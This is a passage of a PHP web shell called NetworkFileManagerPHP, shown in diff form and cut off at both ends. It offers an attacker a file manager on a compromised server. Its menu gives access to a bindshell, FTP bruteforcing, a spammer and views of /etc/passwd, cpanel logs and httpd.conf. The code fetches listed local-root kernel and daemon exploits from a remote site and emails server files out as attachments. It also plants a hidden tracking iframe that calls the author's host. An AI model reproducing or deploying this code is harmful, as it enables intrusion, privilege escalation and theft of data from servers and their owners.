+$port[5423] = "Apple VirtualUser"; + +$port[5555] = "Personal Agent"; + +$port[5631] = "PCAnywhere data"; + +$port[5632] = "PCAnywhere"; + +$port[5678] = "Remote Replication Agent Connection"; + +$port[5800] = "VNC"; + +$port[5801] = "VNC"; + +$port[5900] = "VNC"; + +$port[5901] = "VNC"; + +$port[6000] = "X Windows"; + +$port[6112] = "BattleNet"; + +$port[6502] = "Netscape Conference"; + +$port[6667] = "IRC"; + +$port[6670] = "VocalTec Internet Phone, DeepThroat"; + +$port[6699] = "napster"; + +$port[6776] = "Sub7"; + +$port[6970] = "RTP"; + +$port[7007] = "MSBD, Windows Media encoder"; + +$port[7070] = "RealServer/QuickTime"; + +$port[7777] = "cbt"; + +$port[7778] = "Unreal"; + +$port[7648] = "CU-SeeMe"; + +$port[7649] = "CU-SeeMe"; + +$port[8000] = "iRDMI/Shoutcast Server"; + +$port[8010] = "WinGate 2.1"; + +$port[8080] = "HTTP"; + +$port[8181] = "HTTP"; + +$port[8383] = "IMail WWW"; + +$port[8875] = "napster"; + +$port[8888] = "napster"; + +$port[8889] = "Desktop Data TCP 1"; + +$port[8890] = "Desktop Data TCP 2"; + +$port[8891] = "Desktop Data TCP 3: NESS application"; + +$port[8892] = "Desktop Data TCP 4: FARM product"; + +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; + +$port[8894] = "Desktop Data TCP 6: COAL application"; + +$port[9000] = "CSlistener"; + +$port[10008] = "cheese worm"; + +$port[11371] = "PGP 5 Keyserver"; + +$port[13223] = "PowWow"; + +$port[13224] = "PowWow"; + +$port[14237] = "Palm"; + +$port[14238] = "Palm"; + +$port[18888] = "LiquidAudio"; + +$port[21157] = "Activision"; + +$port[22555] = "Vocaltec Web Conference"; + +$port[23213] = "PowWow"; + +$port[23214] = "PowWow"; + +$port[23456] = "EvilFTP"; + +$port[26000] = "Quake"; + +$port[27001] = "QuakeWorld"; + +$port[27010] = "Half-Life"; + +$port[27015] = "Half-Life"; + +$port[27960] = "QuakeIII"; + +$port[30029] = "AOL Admin"; + +$port[31337] = "Back Orifice"; + +$port[32777] = "rpc.walld"; + +$port[45000] = "Cisco NetRanger postofficed"; + +$port[32773] = "rpc bserverd"; + +$port[32776] = "rpc.spray"; + +$port[32779] = "rpc.cmsd"; + +$port[38036] = "timestep"; + +$port[40193] = "Novell"; + +$port[41524] = "arcserve discovery"; + + + +/* finished config, here goes the design */ + +$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">"; + +$style=<<<style + +<style> + +a. { + +color: #ffffcc; + +text-decoration:none; + +font-family: Times New Roman; + +font-weight: bold; + + } + +a.menu:hover { + +color: #FF0000; + +font-family: Times New Roman; + +text-decoration: none + +font-weight: bold; + + } + +a { + +color: #000000; + +text-decoration:none; + +font-family: Tahoma; + +font-size: 11px; + + } + +a:hover { + +color: #184984; + +font-family: Tahoma; + +text-decoration: underline + +font-size: 11px; + + } + +td.up{ + +color: #996600; + +font-family: Verdana; + +font-weight: normal; + +font-size: 11px; + +} + +.pagetitle { + +font-family: Arial, Helvetica, sans-serif; + +color: #FFFFFF; + +text-decoration: none; + +font-size: 12px + +} + +.alert { + +color: #FF0000; + +font-family: Tahoma; + +font-size: 11px; + + } + +.button1 { + +font-size:11px; + +font-weight:bold; + +font-family:Verdana; + +background:#184984; + +border:1px solid #000000; cursor:hand; color:#ffffcc; + +} + +.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal} + +.submit_button { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;} + +.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid} + +b { font-weight: bold} + +table { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984} + +</style> + +style; + + + +/* table styles */ + +$style1=<<<table + +STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +table; + +$style2=<<<table_file + +STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +table_file; + +$style3=<<<table_dir + +STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'" + +table_dir; + +$style4=<<<table_files + +STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'" + +table_files; + +$style_button=<<<button + +STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" + +button; + +$style_open=<<<open + +STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'" + +open; + +$style_close=<<<close + +STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'" + +close; + +$ins=<<<ins + +<script> + +function ins(text){ + +document.hackru.chars_de.value+=text; + +document.hackru.chars_de.focus(); + +} + +</script> + +ins; + + + +/* send form */ + +$form = " + +<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr> + + <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td> + + </tr> <form method='POST' action='$PHP_SELF?action=feedback&status=ok'> + + <tr> + + <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td> + + </tr> + + <tr> + + <td width='250' class=pagetitle><b>Your name:</b></td> + + <td width='250' class=pagetitle> + + <input type='text' name='name' size='40' class='inputbox'></td> + + </tr> + + <tr> + + <td width='250' class=pagetitle><b>Email:</b></td> + + <td width='250'><input type='text' name='email' size='40' class='inputbox'></td> + + </tr> + + + + <tr> + + <td colspan=2 align=center class=pagetitle><b> + + Your questions and wishes: + + </b></font></b></td> + + </tr> + + <tr> + + <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr> + + <tr> + + <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td> + + <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td> + + </tr> + +</form></table><br> + +"; + + + + + + + +/* HTML Form */ + +$HTML=<<<html + +<html> + +<head> + +<title>$title $ver</title> + +$meta + +$style + +$ins + +</head> + + + +<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> + +<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr> + +<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr> + +<tr> + +<td class=pagetitle align=center width='85%'><b>Script help:</b></td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td> + +</tr> + + + +<tr> + +<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td> + +</tr> + +<tr> + +<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td> + +<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td> + +<td $style_open align=center width='15%' colspan=3><a class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td> + +<tr> + +<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td> + +</tr> + +<tr> + +<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td> + +</tr> + +<tr> + +<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td> + + + +</tr> + +<!-- add by revers --> + +<tr> + +<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td> +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td> + +</tr> + +<!-- end add by revers --> + +</table> + +html; + +$key="goatse"; + +$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>"; + +/* randomizing letters array for random filenames of compression folders */ + +$CHARS = "abcdefghijklmnopqrstuvwxyz"; + +for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)]; + + + +/* set full path to host and dir where public exploits and soft are situated */ + +$public_site = "http://hackru.info/adm/exploits/public_exploits/"; + +/* $public_site = "http://localhost/adm/public_exploits/"; */ + +/* Public exploits and soft */ + +$public[1] = "s"; // bindshell + +$title_ex[1] = " + +&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br> + +<dd><b>Run:</b> ./s<br> + +&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u> + +"; + +$public[2] = "m"; // mremap + +$title_ex[2] = " + +&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br> + +<dd><b>Run:</b> ./m<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$public[3] = "p"; // ptrace + +$title_ex[3] = " + +&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br> + +<dd><b>Run:</b> ./p<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc + +$title_ex[4] = " + +&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br> + +<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br> + +<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br> + +&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall! + +"; + +/* Private exploits */ + +$private[1] = "brk"; // localroot root linux 2.4.* + +$title_exp[1] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br> + +<dd><b>Run:</b> ./brk<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK + +$title_exp[2] = " + +&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br> + +<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br> + +glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[3] = "glftpd"; + +$title_exp[3] = " + +&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br> + +part 2<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[4] = "sortrace"; + +$title_exp[4] = " + +&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br> + +<dd><b>Run:</b> ./sortrace<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[5] = "root"; + +$title_exp[5] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br> + +<dd><b>Run:</b> ./root<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[6] = "sxp"; + +$title_exp[6] = " + +&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br> + +<dd><b>Run:</b> ./sxp<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[7] = "ptrace_kmod"; + +$title_exp[7] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br> + +<dd><b>Run:</b> ./ptrace_kmod<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[8] = "mr1_a"; + +$title_exp[8] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br> + +<dd><b>Run:</b> ./mr1_a<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +/* set full path to host and dir where private exploits and soft are situated */ + +$private_site = "http://hackru.info/adm/exploits/private_exploits/"; + +endif; + + + +$createdir= "files"; + + + +/* spamer config */ + + + +$sendemail = "packetstorm@km.ru"; + +$confirmationemail = "packetstorm@km.ru"; + +$mailsubject = "Hello!This is a test message!"; + + + + + + + +/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */ + +global $action,$tm,$cm; + + + +function getdir() { + + global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF; + + $st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("<br>"); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>"); + + for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>"); + + $free = tinhbyte(diskfreespace("./")); + + print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>"); + + print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>"); + + print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>"); + + print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>"); + + print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>"); + + print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>"); + + +} + +function tinhbyte($filesize) { + + if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } + + elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; } + + elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } + + else { $filesize = $filesize . ""; } + + return $filesize; + +} + + + +function permissions($mode) { + + $perms = ($mode & 00400) ? "r" : "-"; + + $perms .= ($mode & 00200) ? "w" : "-"; + + $perms .= ($mode & 00100) ? "x" : "-"; + + $perms .= ($mode & 00040) ? "r" : "-"; + + $perms .= ($mode & 00020) ? "w" : "-"; + + $perms .= ($mode & 00010) ? "x" : "-"; + + $perms .= ($mode & 00004) ? "r" : "-"; + + $perms .= ($mode & 00002) ? "w" : "-"; + + $perms .= ($mode & 00001) ? "x" : "-"; + + return $perms; + +} + + + +function readdirdata($dir) { + + global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF; + + $files = array(); + + $dirs= array(); + + $open = @opendir($dir); + + + + if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>"; + + else { + + $open = opendir($dir); + + while ($file = readdir($open)) { + + $rec = $file; + + $file = $dir."/".$file; + + if (is_file($file)) $files[] = $rec; + + } + + sort($files); + + $open = opendir($dir); + + $i=0; + + while ($dire = readdir($open)) { + + if ( $dire != "." ) { + + $rec = $dire; + + $dire = $dir."/".$dire; + + if (is_dir($dire)) { + + $dirs[] = $rec; + + $i++; + + } + + } + + } + + sort($dirs); + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>"); + + for ($i=0;$i<sizeof($dirs);$i++) { + + if ($dirs[$i] != "..") { + + $type = 'Dir'; + + $fullpath = $dir."/".$dirs[$i]; + + $time = date("d/m/y H:i",filemtime($fullpath)); + + $perm = permissions(fileperms($fullpath)); + + $size = tinhbyte(filesize($fullpath)); + + $name = $dirs[$i]; + + $fullpath = $tm."/".$dirs[$i]; + + if ($perm[7] == "w" && $name != "..") $action = " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td> + + <td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td> + + </tr> + + <tr> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td> + + </tr></table>"; + + else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>"; + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>"); + + } + + } + + for ($i=0;$i<sizeof($files);$i++) { + + $type = 'File'; + + $fullpath = $dir."/".$files[$i]; + + $time = date("d/m/y H:i",filemtime($fullpath)); + + $perm = permissions(fileperms($fullpath)); + + $size = tinhbyte(filesize($fullpath)); + + if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td> + + </tr></table>"; + + if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td> + + </tr></table>"; + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>"); + + } + + } + +} + + + +function html() { + +global $ver,$meta,$style; + +echo " + +<html> + +<head> + +<title>NetworkFileManagerPHP</title> + +</head> + +<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> + +"; + +} + + + +# file view + +function viewfile($dir,$file) { + + + + $buf = explode(".", $file); + + $ext = $buf[sizeof($buf)-1]; + + $ext = strtolower($ext); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + + + switch ($ext) { + + case "jpg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "jpeg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "gif": + + + + header("Content-type: image/gif"); + + readfile($fullpath); + + break; + + + + case "png": + + + + header("Content-type: image/png"); + + readfile($fullpath); + + break; + + default: + + + + case "avi": + + header("Content-type: video/avi"); + + readfile($fullpath); + + + + break; + + default: + + + + case "mpeg": + + header("Content-type: video/mpeg"); + + readfile($fullpath); + + break; + + default: + + + + case "mpg": + + header("Content-type: video/mpg"); + + readfile($fullpath); + + break; + + default: + + + + html(); + + chdir($dir); + + getdir(); + + + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white face ='Tahoma' size = 2>$fullpath</font></td></tr></table>"; + + $fp = fopen($fullpath , "r"); + + while (!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + + + $st = str_replace("&", "&amp;", $st); + + $st = str_replace("<", "&lt;", $st); + + $st = str_replace(">", "&gt;", $st); + + + + $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>"; + + echo $tem; + + fclose($fp); + + break; + + } + +} + + + +# send file to mail + +function download_mail($dir,$file) { + + global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED; + + $buf = explode(".", $file); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + $size = tinhbyte(filesize($fullpath)); + + $fp = fopen($fullpath, "rb"); + + while(!feof($fp)) + + + + $attachment .= fread($fp, 4096); + + $attachment = base64_encode($attachment); + + $subject = "NetworkFileManagerPHP ($file)"; + + + + $boundary = uniqid("NextPart_"); + + $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; + + + + $info = "---==== Message from ($demail)====---\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + + + + $send_to = "$demail"; + + + + $send = mail($send_to, $subject, $info, $headers); + + + + if($send == 2) + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center> + + <font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>"; + + + +fclose($fp); + + } + + + + + + + +function copyfile($dir,$file) { + + global $action,$tm; + + $fullpath = $dir."/".$file; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>"; + + if (!copy($file, $file.'.bak')){ + + echo (" unable to copy file $file"); + + } + +} + + + + + +# file edit + +function editfile($dir,$file) { + + global $action,$datar; + + $fullpath = $dir."/".$file; + + chdir($dir); + + getdir(); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>"; + + $fp = fopen($fullpath , "r"); + + while (!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + $st = str_replace("&", "&amp;", $st); + + $st = str_replace("<", "&lt;", $st); + + $st = str_replace(">", "&gt;", $st); + + $st = str_replace('"', "&quot;", $st); + + echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>"; + + $datar = $S1; + + + +} + + + +# file write + +function savefile($dir,$file) { + + global $action,$S1,$tm; + + $fullpath = $dir."/".$file; + + $fp = fopen($fullpath, "w"); + + $S1 = stripslashes($S1); + + fwrite($fp,$S1); + + fclose($fp); + + chdir($dir); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>"; + + getdir(); + + readdirdata($tm); + +} + + + +# directory delete + +function deletef($dir) + +{ + + global $action,$tm,$fi; + + $tm = str_replace("\\\\","/",$tm); + + $link = $tm."/".$fi; + + unlink($link); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# file upload + +function uploadtem() { + + global 